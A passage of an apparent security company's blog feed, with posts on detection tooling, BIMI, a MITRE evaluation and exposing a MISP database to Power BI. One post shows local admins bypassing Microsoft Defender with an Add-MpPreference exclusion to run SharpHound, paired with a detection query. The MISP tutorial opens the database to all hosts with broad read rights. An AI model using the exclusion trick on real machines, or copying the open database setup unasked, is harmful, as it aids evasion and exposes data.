Figure 11: Microsoft Sentinel detection coverage

Conclusion

Dettectinator is a highly efficient tool that can help you optimize your detection engineering processes. By automating certain tasks, it frees up your time and resources to focus on more complex, high-level tasks.

When used in conjunction with DeTT&CT, it provides a real-time overview of your current detection coverage, giving you a clear understanding of your strengths and areas for improvement. Additionally, Dettectinator comes equipped with a range of integrations that are suitable for a variety of environments, making it a versatile and efficient tool.

In addition to its automation capabilities, Dettectinator is also highly customizable. It allows you to tailor its functionality to meet the specific needs of your organization or project.

One of the key benefits of using Dettectinator is its ability to save users a considerable amount of time. It complements DeTT&CT by addressing some of the challenges that users may face, making it an invaluable addition to any detection engineering workflow. In short, if you’re looking to streamline your detection processes and improve your coverage, Dettectinator is an excellent tool to consider.

References

“Dettectinator”, https://github.com/siriussecurity/dettectinator

“Releasing Dettectinator”, https://www.siriussecurity.nl/blog/2022/11/03/releasing-dettectinator

“DeTT&CT : Mapping detection to MITRE ATT&CK”, https://blog.nviso.eu/2022/03/09/dettct-mapping-detection-to-mitre-attck/

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”, https://github.com/rabobank-cdc/DeTTECT

“ATT&CK® Navigator“, https://mitre-attack.github.io/attack-navigator/

About the author

Renaud Frère
Renaud Frère

Renaud is an Incident Response Consultant within the CSIRT team at NVISO with a focus on digital forensics including mobile device forensics. He is also involved in various projects related to Threat Hunting, Detection Engineering and Threat Intelligence. Occasionally, Renaud likes to participate in DFIR CTFs and Netwars.

The Beauty of Being a Cybersecurity Project Manager for NVISO NITRO MDR

19 December 2022 at 08:00

All Project Managers might agree with this: working as a Project Manager is exciting as no two days are ever the same.

Just like a conductor of an orchestra leads all musicians to bring harmonic masterpieces to life, so does the cybersecurity Project Manager leading and coordinating the different stakeholders to bring a project to completion, while overseeing all aspects of it.

Within the Managed Detect and Respond (MDR) Service at NVISO, we, cybersecurity Project Managers, handle several unique projects at the same time, making sure that the onboarding of new clients and the services provided to them as well as to current ones are properly handled on time and within scope. Within our agile company, we implement cyber strategies to provide the best possible service to safeguard our clients from cyber-attacks.

In order to ensure that all deliverables are duly met on time and that risks are mitigated, we create a detailed project plan taking into consideration all the variables and the different teams of engineers and analysts from the client’s and NVISO’s side working on each project. 

Once the project scope has been clearly defined and agreed upon by all parties, we manage the project through all its phases, working closely with our colleagues. We plan the set of activities that need to be undertaken and the relative deadlines, we define priorities, requirements, and success criteria, assign specialist work and make sure that everything is being monitored and delivered as agreed. Similar to the conductor of the orchestra, we set the tempo and ensure that the different groups of instruments, the woodwinds, percussion, brass, strings, and keyboards, all work harmoniously together to deliver their best performance.

Working as a Project Manager is an art, and it requires strong skills. Most importantly a passion for cybersecurity and a client-oriented mindset. Good communication skills are key to the success of a project. Being able to clearly communicate to all different stakeholders and ensuring that the most technical parts of a cybersecurity project are fully understood by all parties is the basis of a good start and development of a project. 

Being able to properly plan and organise is another strong skill that cybersecurity Project Managers need to have. We work in a fast-paced environment, therefore having proper time management and task prioritization skills is essential, as well as ensuring that everything is prepared for the project initiation, building, and testing phases, up until the project closure and its transition to the ongoing service.

Sometimes, unforeseen events happen despite having carried out extensive preparation to mitigate risks. The ability to solve problems and manage conflicts within the team makes a huge difference in the success of a project and is a key skill that Project Managers need to have.

Cybersecurity is a dynamic and evolving sector, and we, cybersecurity Project Managers, have the privilege of being right at the centre of the action. We make projects come to life, and seeing the satisfaction of the clients for the results provided and the fulfilment of the colleagues for the great work done is what makes our job so worth it. 

NVISO provides a variety of services where a cybersecurity Project Manager plays a key role. More information on NVISO’s services can be found here.

Maria Rita Milanese
Maria Rita Milanese

Maria Rita Milanese is a Senior Cybersecurity Consultant working as Project Manager & Service Delivery Manager at NVISO in the CSIRT&SOC Department.

The Key Role of the Service Delivery Manager at NVISO’s Managed Detect & Respond Service

16 December 2022 at 08:00

The Service Delivery Manager (SDM) plays a key role in the delivery of our NVISO cybersecurity NITRO Managed Detect & Respond (MDR) services. As the main point of contact, we represent the client at NVISO and represent NVISO at the client. During the operational lifecycle of a contract, my fellow SDMs and I are responsible for the quality of the cybersecurity services delivered and we ensure an efficient relationship and coordination between the customer and the various NVISO internal departments engaged in the delivery of these services.

NVISO’s NITRO Managed Detect & Respond Service

The NITRO Platform is at the heart of NVISO Managed Services’ offering. The platform is built to support Security Operations, integrating a variety of security technologies to enable efficient orchestration, automation, and response.

Overview of services provided within the NITRO Platform

As part of the NITRO Platform, NVISO has created an MDR service where we combine the latest technology with the best cyber security experts in Europe in order to respond to the many cyber challenges that enterprises encounter.

The automations that are part of the NITRO platform, combined with the in-depth analysis from our security experts, result in an effective and efficient MDR service, providing our customers with triaged incidents with clear actions and recommendations.

In addition, in case of any critical incidents that require an emergency response, our clients can request the intervention of NVISO’s 24/7 Cyber Security Incident Response Team (CSIRT). The CSIRT team can provide in-depth technical services and on-site crisis management support in order to handle any high-severity incidents.

More information on the MDR service provided by NVISO can be found here.

NVISO’s customer dedication and strong reputation

Our customers value NVISO for its client commitment and recognise our strong reputation on providing in-depth technical expertise. As a strongly client-facing role, my fellow SDMs and I build trustworthy relationships with our customers and we understand their business environment and unique requirements. We ensure all contractually agreed services are smoothly and seamlessly delivered and we ensure clients’ requests are handled in an efficient and timely manner.

For clients of the SDM service, we organise monthly and strategic quarterly service delivery meetings including, amongst others, a detailed status report of security events and incidents handled in the reporting period, an analysis of the SLAs (Service Level Agreements) and the overall scope of service. We also discuss any open action items and provide an overview of new engineering features and developments.

Client Portal

Whilst an overview of events and cases is presented to the client on a monthly and quarterly basis, clients can also use the NITRO Client portal to obtain their MDR data in real time.

Clients can access the platform at any time and choose the timeframe that they prefer. They can then start navigating through their events and security cases, which are also visually represented through graphs and charts. 

Dashboard of the NVISO NITRO Client Portal

The platform was developed in-house by NVISO engineers, and it is continuously improved with new features.

The Service Delivery Manager makes a difference in the service

Having a Service Delivery Manager is a great advantage which has a positive impact on the service received by our customers. The SDM is responsible for driving service delivery and problem resolution; she/he represents the client’s business and ensures all is delivered on time and within scope. As a consequence, the clients feel confident that the service is provided at the highest quality standards and that their requests are being heard. For NVISO, client satisfaction is a priority. Therefore, we always strive to build out solid processes to ensure that satisfaction is as high as possible.

About the Author

Maria Rita Milanese
Maria Rita Milanese

Maria Rita Milanese is a Senior Cybersecurity Consultant working as Project Manager & Service Delivery Manager at NVISO in the CSIRT&SOC Department.

Lower email spoofing incidents (and make your marketing team happy) with BIMI

13 December 2022 at 09:00

Introduction

Over the last couple of years, we have seen the number of phishing attacks skyrocket. According to F5, a multi-cloud security and application provider, there was a 220% increase in incidents during the height of the global pandemic compared to the yearly average. Phishing attempts are expected to increase by an additional 15% every year, making phishing one of the most threatening security risks for a company’s IT department.

Email Spoofing

While many malicious actors target an employee with an email sent from what looks like a (very) legitimate domain, there are also a lot of email spoofing incidents, which are harder for the targeted employee to distinguish from legitimate emails. The goal of spoofing is to fool users into believing that the message comes from a person or entity they know or trust. The sender forges the email headers to convince the email client software of the legitimacy of the message. By examining the mail header closely, it is possible to spot the false address, but many users will not suspect a fraudulent email from a sender they know. As a result, they can easily click malicious links or send sensitive data without considering the risks involved.

SPF, DKIM and DMARC

There are several known frameworks to prevent email spoofing, and these are already commonly used by businesses: SPF, DKIM and DMARC. They are adopted to the extent that some mail servers will reject emails that do not comply with these frameworks.


Sender Policy Framework (SPF) works by verifying the identity of the sender of an email by comparing the sender’s IP address to a list of authorized IP addresses that are published in the domain’s DNS records.


With DomainKeys Identified Mail (DKIM), a digital signature is attached to the email which can be used by the recipient to verify the authenticity of the sender.


And finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC). By building on the SPF and DKIM standards, it provides a more comprehensive approach to email authentication. DMARC allows the owner of a domain to publish a policy in their DNS records that specifies which mechanisms are used to authenticate emails sent from their domain, and what to do if an email fails authentication.


When correctly configuring your DNS, you can already go a long way towards lowering the chances of a spoofing attempt. But there is still a low risk of messages with malicious links arriving in the inbox of the receiver, or of legitimate mails being flagged as spam and eventually deleted. By setting up BIMI, you can have that extra security layer while giving your sent emails more exposure with your brand logo.

What is BIMI?

BIMI (Brand Indicators for Message Identification) is a recently (2020) introduced email standard, which makes use of the brand logo of the business as a security control. When configured correctly, client mail software can verify the legitimacy of the received mail by comparing it with the BIMI record in the DNS of the sender.

BIMI-group logo

Preparation for BIMI

When setting up BIMI you need to correctly configure SPF, DKIM and DMARC. Otherwise, the receiving mail software will already fail verification before it even checks the added brand logo. This means:

  • Email service providers are added to the SPF record and set to hard fail (‘-all’)
  • DKIM is configured for all the email service providers and the public key is reachable
  • DMARC is fine-tuned. It is recommended to set the policy to quarantine or reject, and pct to 100.

So, make sure these are checked and analyse the DMARC reports before implementing BIMI.
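For reference, hardened SPF and DMARC records could look like the examples below for a hypothetical domain. Here example.com, the included sender domain and the reporting mailbox are placeholders; your email service provider’s documentation will give you the exact values to use, and the DKIM public key record is published under <selector>._domainkey.example.com:

example.com.          TXT  "v=spf1 include:_spf.example-esp.com -all"
_dmarc.example.com.   TXT  "v=DMARC1; p=quarantine; pct=100; rua=mailto:dmarc-reports@example.com"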

At the moment of writing this blog, only a limited list of mailbox providers supports the implementation and verification of BIMI. Google and Apple Mail are among the most used providers in this list (Link), and more will likely join as BIMI becomes a more commonly used standard. Notably, Microsoft (Outlook) has so far shown no intention of implementing the email standard.

BIMI Example in Gmail Inbox

BIMI Setup

The majority of the work is creating the BIMI SVG Logo files. We recommend using an SVG formatted file which is hosted publicly and can be accessed via HTTPS. It can help to use the SVG conversion tool from the BIMI-group.

When the SVG is in place, you can add the DNS record which begins with the tag “v=BIMI1” and includes the parameter “l=logoURL” where you fill in the link to your externally accessible logo. You can use the BIMI Inspector, which generates a record for you.

Optionally you can use VMC (Verified Mark Certificate), a proof that you own the trademark for your brand logo. By adding this you increase the legitimacy, but this isn’t required yet. This is included in the DNS record together with the URL pointing to the logo’s location.
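Putting it together, an illustrative BIMI record for a hypothetical domain, published as a TXT record on the default selector, could look like this (the a= tag pointing to the VMC is optional, as explained above):

default._bimi.example.com.  TXT  "v=BIMI1; l=https://example.com/brand/logo.svg; a=https://example.com/brand/vmc.pem"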

Conclusion

Now you know what BIMI is, why should you consider configuring this email standard? There are two major reasons:

  1. It provides extra security against email spoofing
  2. It makes your sent mails stand out between all the other marketing mails.

If you want more info on the standard, we recommend checking the website of the group: https://bimigroup.org/

About the author

Karsten De Baere
Karsten De Baere

Karsten is a Senior Security Consultant in the Cyber Strategy and Architect team at NVISO. He assists organisation with assessing and implementing new practices in the SSDLC. In his off time, Karsten likes to do extensive research on new security topics and play with the latest automation gadgets.

Can we block the addition of local Microsoft Defender Antivirus exclusions?

2 December 2022 at 09:00

Introduction

A few weeks ago, I got a question from a client to check how they could prevent administrators, including local administrators on their devices, from adding exclusions in Microsoft Defender Antivirus. I first thought it was going to be pretty easy by pushing some settings via Microsoft Endpoint Manager. However, after doing some research and tests in a lab environment, I discovered that it might not be as easy as I thought.

What capabilities in Microsoft Defender Antivirus can help us?

Microsoft Defender Antivirus, which is part of Microsoft Defender for Endpoint (MDE), is the next-generation protection component of the solution. Microsoft Defender Antivirus comes with different features that can be configured using Microsoft Endpoint Manager (MEM)/Intune, Group Policy, PowerShell, etc. These features include cloud-delivered and real-time protection with behavioral, heuristic and machine learning-based protection.

Because some business applications might be blocked by these capabilities, there is the possibility to create specific exclusions for files, processes and process-opened files from Microsoft Defender Antivirus scans, real-time protection and monitoring. Although they can be useful to benefit from the protection capabilities while preventing any impact on end users and business flows, they represent a protection gap. Indeed, the more exclusions there are, the larger the attack surface is. Therefore, it is a best practice to keep them as limited as possible and to review them periodically.

Because these are protection gaps, you don’t want users adding exclusions locally on their laptop. By default, standard users can’t change, add or remove exclusions; administrators, however, can. This is where our problems start. We want to prevent users from helping themselves by installing suspicious software, and we don’t want attackers that have gained sufficient privileges to add exclusions so that they can install and run their malicious payloads.

How can we prevent users from adding exclusions? We can? Right? We will go over different possibilities in Microsoft Defender for Endpoint to do so.

Tamper Protection

First, let’s have a look at Tamper Protection. By searching on the Internet, I found a few posts mentioning that Tamper Protection could help us to solve this issue.

Tamper Protection is a feature that, as its name suggests, protects specific security settings against tampering. The main objective of Tamper Protection is to make sure attackers can’t disable security features to get easier access to your data, install malware or run exploits. In practice, Tamper Protection prevents the following:

  • Disabling virus and threat protection
  • Disabling real-time protection
  • Turning off behavior monitoring
  • Disabling antivirus protection, such as IOfficeAntivirus (IOAV)
  • Disabling cloud-delivered protection
  • Removing security intelligence updates
  • Disabling automatic actions on detected threats
  • Suppressing notifications in the Windows Security app
  • Disabling scanning of archives and network files

Therefore, we can already see that this is not going to help us here. I can also confirm this based on the tests that I have done. During the tests, Tamper Protection is enabled at the tenant level in the Microsoft 365 Defender portal and therefore applied to all devices by default.

Local Admin Merge

Secondly, we have the Defender “local admin merge” feature. This capability looks more interesting. Indeed, it allows you to control whether exclusion list settings configured by a local admin are merged with the managed settings from an Intune policy. We can use a Microsoft Defender Antivirus profile in Microsoft Endpoint Manager to configure it:

Enforce "Disable Local Admin Merge" in an Antivirus profile in MEM
Enforce “Disable Local Admin Merge” in an Antivirus profile in MEM

Three values are supported for the Disable Local Admin Merge:

  • Not configured: preference settings configured by local administrators will be merged into the resulting effective policy. If there are conflicts, settings from Intune will override local preference settings.
  • Enable Local Admin Merge: same as Not configured.
  • Disable Local Admin Merge: Intune-managed settings override preference settings that are configured by local administrators.

Theoretically, the Disable Local Admin Merge value would prevent local admins from creating exclusions. We will test that in a moment, but let’s check first if this setting is correctly applied on my device. In the registry editor, I verify that the DisableLocalAdminMerge key is set to 1:

DisableLocalAdminMerge key set to 1 (enforced)
DisableLocalAdminMerge key set to 1 (enforced)

It seems to be the case here, great! If we go to Windows Security on the local machine, we can see that exclusions already exist and that we can’t add or manage them. This is because these policies have been pushed through Intune:

Existing exclusions configured via Intune
Existing exclusions configured via Intune

We will now see if we can still add local exclusions to download and run malicious software. First, if we try to download SharpHound for example, it will end up in the user’s download folder and get removed automatically:

Windows Security alert: Threat found
Windows Security alert: Threat found

As mentioned before, exclusions can be managed in PowerShell. We will add an exclusion for our Downloads folder using the PowerShell cmdlet Add-MpPreference -ExclusionPath 'C:\Users\<USERNAME>\Downloads' (make sure to replace <USERNAME>). We can then verify the exclusions that currently apply using Get-MpPreference, as shown below:

Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus
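For reference, here are the two commands written out so they can be copy-pasted; the pipe to Select-Object is simply a convenience to narrow the output to the exclusion paths:

# Add an antivirus exclusion for the current user's Downloads folder (replace <USERNAME>)
Add-MpPreference -ExclusionPath 'C:\Users\<USERNAME>\Downloads'

# List the exclusion paths that are currently in effect
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath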

It looks like our exclusion has been successfully added (see ExclusionPath). Once added, SharpHound can be downloaded and is not removed by Microsoft Defender Antivirus. Additionally, if we bypass the Windows antimalware warning, it can be executed (my machine is not joined to any domain hence the error in SharpHound):

Run SharpHound
Run SharpHound

Note that alerts will still be generated in Microsoft 365 Defender for this action because the endpoint detection and response (EDR) capability of Microsoft Defender for Endpoint is running and antivirus exclusions do not apply to it. Indeed, the purpose of EDR is to detect post-breach activities. Usually, EDR is set in block mode to remediate these post-breach detections when a non-Microsoft antivirus product is running.

EDR detection for SharpHound

Based on that, it seems that Disable Local Admin Merge does not allow us to prevent local admins from adding exclusions via PowerShell. Note that the same is possible via WMI using the MSFT_MpPreference class. In fact, what I have observed during my testing is that the created exclusions are overwritten when the device is restarted or when policies are pushed again. However, the exclusion did allow us to download and run SharpHound during this time.

Hide Exclusions From Local Admins

The last feature that I wanted to talk about is the Hide Exclusions From Local Admins setting. This setting is not available in the Microsoft Defender Antivirus profile yet, but it can already be configured with a custom configuration profile or with a Group Policy, for example. When enabled, exclusions are no longer visible to administrators in PowerShell, Windows Security and the registry editor.

It can be configured using the following registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\HideExclusionsFromLocalAdmins.

Hide exclusions from local admins registry key
Hide exclusions from local admins registry key
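For a quick test in a lab, the value can be set directly from an elevated command prompt; in production you would push it via a custom configuration profile or Group Policy as mentioned above:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v HideExclusionsFromLocalAdmins /t REG_DWORD /d 1 /f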

If the value is set to 1, as is currently the case, all access to exclusions is blocked for administrators, as shown below:

  • Registry Editor:
Exclusions in Registry Editor can't be accessed
Exclusions in Registry Editor can’t be accessed
  • Windows Security application
Exclusions in Windows Security can't be accessed
Exclusions in Windows Security can’t be accessed
  • PowerShell
Exclusions can't be accessed using Defender PowerShell cmdlet
Exclusions can’t be accessed using Defender PowerShell cmdlet
Exclusions can't be accessed by browsing registry keys in PowerShell
Exclusions can’t be accessed by browsing registry keys in PowerShell

However, it does not block admins from adding exclusions; it only prevents them from viewing the existing ones.

Detection

At the time of writing, there is no method to block administrators from adding exclusions. As general guidance, it is a best practice to avoid granting local administrator permissions to users on their machine. However, this might not always be possible for multiple reasons. In that case, it might be interesting to implement detection measures.

In the Microsoft 365 Defender portal, custom detection rules can be created to detect and alert when such events occur. Moreover, if Microsoft Defender for Endpoint events are connected to Microsoft Sentinel, an analytics rule could also be created. We will focus on creating a custom detection rule in Advanced Hunting in the Microsoft 365 Defender portal as part of this blog post.

When adding an exclusion in Microsoft Defender Antivirus, a registry key is created. Therefore, we can query the DeviceRegistryEvents with the following Advanced Hunting query:

DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

However, during my tests, I have noticed that exclusions configured in Intune are pushed again every time a device is restarted. Therefore, this query would generate a lot of false positives. To prevent that, the legitimate exclusions could be defined in the query to make sure the rule only triggers on non-legitimate exclusions.

let exclusions = dynamic ([
"C:\\myapp",
"myapp.exe",
".app"
]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey has "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"
| where RegistryValueName !in (exclusions)

A custom detection rule can be created based on the DeviceId, and rule properties, such as response actions, can be specified to help investigation and remediation activities.

Conclusion

As we have seen during this blog post, it is currently not possible to block administrators from adding exclusions in Microsoft Defender for Endpoint. If local administrators are required on devices, detection mechanisms can be implemented to make sure your security operations teams have visibility on such events.

About the author

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products. Additionally, Guillaume has recently gained an interest in DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

You can find Guillaume on LinkedIn.

NVISO EXCELS IN MITRE ATT&CK® MANAGED SERVICES EVALUATION

9 November 2022 at 14:13

As one of the only EU-based Cyber Security companies, NVISO successfully participated in a first-of-its-kind, MITRE-led, evaluation of Managed Security Services (MSS).

MITRE Evaluation Graphic


The inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Security Services ran in June 2022 and its results have been published today. NVISO performed excellently in the evaluation, demonstrating services that are at or above the level of traditional titans of the industry.


During this evaluation, NVISO was tested on its ability to detect and report advanced attacks that were executed by the MITRE team.

“The tests were simulating real-life scenarios in which only detection and reporting was evaluated – we were not allowed to block or respond to any attacks”, says Erik Van Buggenhout, Partner, responsible for Managed Security Services at NVISO. A test environment was set up in which participants would deploy their tools and detection services.

“NVISO chose to deploy Palo Alto’s Cortex XDR – an XDR tool that integrates seamlessly into our service and client environments. The combination of XDR with our NITRO automation platform and NVISO world-class expertise ensures that our Managed Detection and Response service is top notch and future-proof. While we have always believed in our own strategy, we are excited and proud to receive MITRE’s external and independent validation of the outstanding quality of our services.”, Erik says.

NVISO was one of the only EU-based Cyber Security companies participating in this elite evaluation. “NVISO is a true European Cyber Security company, which is reflected well in its mission: to safeguard the foundations of European society from cyber attacks”, says Maxim Deweerdt, head of MSS presales at NVISO.

NVISO was founded in 2013 in Belgium and has since offered services to large and mid-sized customers in almost 20 countries, mostly in Europe. NVISO has offices in Brussels, Frankfurt, Munich, Vienna and Athens. “The way NVISO approaches Managed Detection and Response is typical for our company: we challenge the status-quo and provide an innovative approach driven by our expertise and long experience in cyber defense”, Maxim says, “This evaluation has highlighted and validated our approach, and confirms the positive feedback we receive from customers”.


More information about the evaluation and NVISO’s services can be found here: https://mitre.nviso.eu

About MITRE

MITRE Engenuity is a US nonprofit organization launched in 2019 “to collaborate with the private sector on solving industry-wide problems with cyber defense” in collaboration with corporate partners. They are best known in the Cyber Security world for their work on the ATT&CK® framework, which is a global knowledge base of threat activity, techniques and models. The ATT&CK® framework is used by almost every vendor and provider in the Cyber Defense industry.

www.mitre-engenuity.org

About NVISO

NVISO is a pure-play Cyber Security company founded in 2013 in Brussels by 5 ex-Big Four managers. They always had an itch to do things differently (and better) and decided to start their own company with a strong mission: to safeguard the foundations of European society from cyber attacks. NVISO currently employs about 200 people and has offices in Brussels, Frankfurt, Munich, Vienna and Athens. NVISO is rapidly expanding into other countries and has an aggressive growth strategy for the next years. NVISO has customers in 20+ countries, primarily in the Finance, Government, Defense, and Technology sectors.

www.nviso.eu



Visualizing MISP Threat Intelligence in Power BI – An NVISO TI Tutorial

9 November 2022 at 13:42
MISP Power BI Dashboard

Problem Statement

Picture this. You are standing up your shiny new MISP instance to start to fulfill some of the primary intelligence requirements that you gathered via interviews with various stakeholders around the company. You get to some requirements that are looking for information to be captured in a visualization, preferably in an automated and constantly updating dashboard that the stakeholder can look into at their leisure.

Well MISP was not really made for that. There is the MISP-Dashboard repo but that is not quite what we need. Since we want to share the information and combine it with other data sources and make custom visualizations we need something more flexible and linked to other services and applications the organization uses. Also it looks as if other stakeholders would like to compare and contrast their datasets with that of the TI program. Then you think, it would be nice to be able to display all the work that we put into populating the MISP instance and show value over time. How the heck are we going to solve all of these problems with one solution which doesn’t cost a fortune???

Links to review:

CTIS-2022 Conference talk – MISP to PowerBI: https://youtu.be/0i7_gn1DfJU
MISP-Dashboard powered by ZMQ: https://github.com/MISP/misp-dashboard

Proposed Solution

Enter this idea = “Making your data (and yourself/your team) look amazing with Power BI!”

In this blog we will explain how to use the functionality of Power BI to accomplish all of these requirements. Along the way you will probably come up with other ideas around data analytics that go beyond just the TI data in your MISP instance. Having all this data in a platform that allows you to slice and dice it without messing with the original source is truly game changing.

What is MISP???

If you do not know what MISP is, I prepped this small section.

MISP is a Threat Intelligence Sharing Platform that is now community driven. You can read more about its history here: https://www.misp-project.org/

In a nutshell, MISP is a platform that allows you to capture, generate, and share threat intelligence in a structured way. It also helps control which data each user and organization is allowed to access. It uses MariaDB as its back-end database. MariaDB is a fork of MySQL. This makes it a prime candidate for using Power BI to analyze the data.

What is Power BI???

Power BI is a set of products and services offered by Microsoft to enable users to centralize Business Intelligence (BI) data with all the tools to analyze and visualize it. Other applications and services that are similar to Power BI are Tableau, MicroStrategy, etc.

Power BI Desktop

  • Desktop application
  • Complete data analysis solution
  • Includes Power Query Editor (ETLs)
  • Can upload data and reports to the Power BI service
  • Can share reports and templates manually with other Power BI Desktop users
  • Free (as in beer), runs on modern Windows systems

Power BI Service

  • Cloud solution
  • Can link visuals in reports to dashboards (scheduled data syncs)
  • Used for collaboration and sharing
  • Limited data modelling capabilities
  • Not Free (Pro license level included with Microsoft E5 license, per individual licenses available as well)

Links to Pricing

More information here: https://docs.microsoft.com/en-gb/power-bi/fundamentals/power-bi-overview and https://powerbi.microsoft.com/en-au/pricing/

Making the MISP MariaDB accessible to Power BI Desktop

MISP uses MariaDB which is a fork of MySQL. These terms are used interchangeably during this blog. You can use MariaDB or MySQL on the command line. I will use MySQL in this blog for conciseness.

Adding a Power BI user to MariaDB

When creating your MISP instance, you create a root user for the MariaDB service. Log in with that user to create a new user that can read the MISP database.

mysql -u root -p
# List users
SELECT User, Host FROM mysql.user;
# Create new user
CREATE USER 'powerbi'@'%' IDENTIFIED BY '<insert_strong_password>';
GRANT SELECT on *.* to 'powerbi'@'%';
FLUSH PRIVILEGES;
# List users again to verify
SELECT User, Host FROM mysql.user;
# Close mysql terminal
exit

Configuring MariaDB to Listen on External Interface

We need to make the database service accessible outside of the MISP instance. By default it listens only on 127.0.0.1

sudo netstat -tunlp
# You should see that mysqld is listening on 127.0.0.1:3306

# Running the command below is helpful if you do not know what locations are being read for configuration information by mysql
mysql --help | grep "Default options" -A 1

# Open the MariaDB config file below as it is the one that is being used by default in normal MISP installs.
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

# I will not go into how to use vim as you can use the text editor of your choice. (There are strong feelings here....)
# Add the following lines in the [mysqld] section:

skip-networking=0
skip-bind-address

# Comment out the bind-address line with a # 
#bind-address

# Should look like this when you are done: #bind-address            = 127.0.0.1
# Then save the file

# Restart the MariaDB service
sudo service mysql restart

# List all the listening services again to validate our changes. 
sudo netstat -tunlp
# You should see the mysqld service now listening on 0.0.0.0:3306

Optional: Setup Firewall Rules to Control Access (recommended)

To maintain security we can add host-based firewall rules to ensure only our selected IPs or network ranges are allowed to connect to this service. If you are in a local environment, behind a VPN, etc., then this step might not be necessary. Below is a quick command to enable UFW on Ubuntu and allow all the ports needed for MISP, MySQL, and for maintenance via SSH.

# Switch to root for simplicity
sudo su -

# Show current status
ufw status

# Set default rules
ufw default deny incoming
ufw default allow outgoing

# Add your trusted network range or specific IPs for the ports below. If there are additional services you need to allow connections to you can add them in the same manner. Example would be SNMP. Also if you are using an alternate port for SSH, make sure you update that below or you will be cut off from your server. 
ufw allow from 10.0.0.0/8 to any port 22,80,443,3306 proto tcp

# Show new rules listed by number
ufw status numbered

# Start the firewall
ufw enable

For more information on UFW, I suggest the Digital Ocean tutorials.

You can find a good one here: https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-20-04

Testing Access from Remote System with MySQL Workbench

Having a tool to test and work with MySQL databases is crucial in my opinion. I use the official “MySQL Workbench” that can be found at the link below:
https://dev.mysql.com/downloads/workbench/

You can follow the documentation here on how to use the tool and create a connection: https://dev.mysql.com/doc/workbench/en/wb-mysql-connections-new.html

Newer versions of the Workbench try to enforce connections to databases over SSL/TLS for security reasons. By default, the database connection in use by MISP does not have encryption configured. It is also out of the scope of this article to set this up. To get around this, you can add useSSL=0 to the “Others” text box in the Advanced tab of the connection entry for your MISP server. When you test the connection, you will receive a pop-up warning about incompatibility. Proceed and you should have a successful test.

MySql Workbench Settings

Once the test is complete, close the create connection dialog. You can then click on the connection block in Workbench and you should be shown a screen similar to the one below. If so, congratulations! You have set up your MISP instance database to be queried remotely.

MySQL Workbench Data Example
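If you prefer the command line over Workbench, the same connectivity check can be done with the mysql client from any host that is allowed through the firewall (assuming the client is installed there; <MISP_SERVER_IP> is a placeholder):

mysql -h <MISP_SERVER_IP> -P 3306 -u powerbi -p -e "SELECT COUNT(*) FROM misp.events;"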

Installing Power BI Desktop and MySQL Drivers

Oracle MySQL Connector

For Power BI Desktop to connect to the MySQL server you will need to install a “connector” which tells Power BI how to communicate with the database. Information on this process is found here: https://docs.microsoft.com/en-us/power-query/connectors/mysqldatabase
The “connector” itself can be downloaded from here: https://dev.mysql.com/downloads/connector/net/

You will have to create a free Oracle account to be able to download the software.

Test Access from Power BI Desktop to MISP MariaDB

Once installed, you will be able to select MySQL from the “Get data” button in the ribbon in the Data section of the Home tab. (Or the splash screen that pops up each time you load Power BI Desktop, hate that thing. I swear I have unchecked the “Show this screen on startup” but it doesn’t care. I digress.)

Do not get distracted by the amount of datatypes you can connect to Power BI. This is where the nerd rabbit hole begins. FOCUS!

  1. Click on Get data
  2. Click on More…
  3. Wait for it to load
  4. Type “MySQL” in the search box
  5. Select MySQL database from the panel to the right
  6. Click Connect
Selecting Data Type
  1. Setup IP address and port in the Server field for your MISP instance
  2. Type misp in the Database field
  3. Click OK
Configure MISP Connection Information
  1. Select Database for the credential type
  2. Enter the user we created and the password
  3. Select the database level in the “Select which level to apply these settings to” drop-down menu
  4. Click Connect
Connecting to the MISP MariaDB Service

View your data in all its glory!

If you get an error such as “An error happened while reading data from the provider: ‘Character set ‘utf8mb3’ is not supported by .Net Framework.”, do not worry. Just install the latest version of the .NET Framework and the latest MySQL Connector for .NET. This should fix any issues you are having.

You can close the window; Power BI will remember and store the connection information for next time.

If you cannot authenticate or connect, recheck your username and password and confirm that you can reach the MISP server on port 3306 from the device that you are running Power BI Desktop on. Also, make sure you are using Database for the authentication type and not Windows Auth.

Create a save file so that we can start working on our data ingest transforms and manage the relationships between the various tables in the MISP schema.

  1. Select File
  2. Save As
  3. Select the location where you will save the local copy of your Power BI report.
  4. Click Save

Now, we have a blank report file and pre-configured data source. Awesomeness!

Power Query Transforms (ETL Process)

ETL: extract, transform, load. Look it up. Big money in the data analytics space by the way.

So, let’s get into looking at the data and making sure it is in the right format for our purposes. If you closed Power BI Desktop, open it back up. Once loaded, click on file and then Open report. Select the report you saved earlier. So, we have a nice and empty workspace. Let’s fix that!

In the Ribbon, click on Recent sources and select the source we created earlier. You should be presented with Navigator and a list of tables under the misp schema.

Selecting Tables in Power BI Desktop

Load all the tables we want to use for visualizations in one go. In my experience, it helps to do this all at once instead of trying to add additional tables at a later date.

Select the tables in the next subsection, Recommended Tables, and click Load. This could take a while if your MISP instance has a lot of Events and Attributes in it. It will create a local copy of the database so that you can create your reports accurately. Then you can refresh this local copy when needed. We will talk about data refresh later as well.

Do not try to transform the data at this step, especially if your MISP instance has a lot of data in it. We will do the transforms in a later step.

Data Importing Into Power BI Desktop

Recommended Tables

  • misp.attribute_tags
  • misp.attributes
  • misp.event_blocklists
  • misp.event_tags
  • misp.events
  • misp.galaxies
  • misp.galaxy_clusters
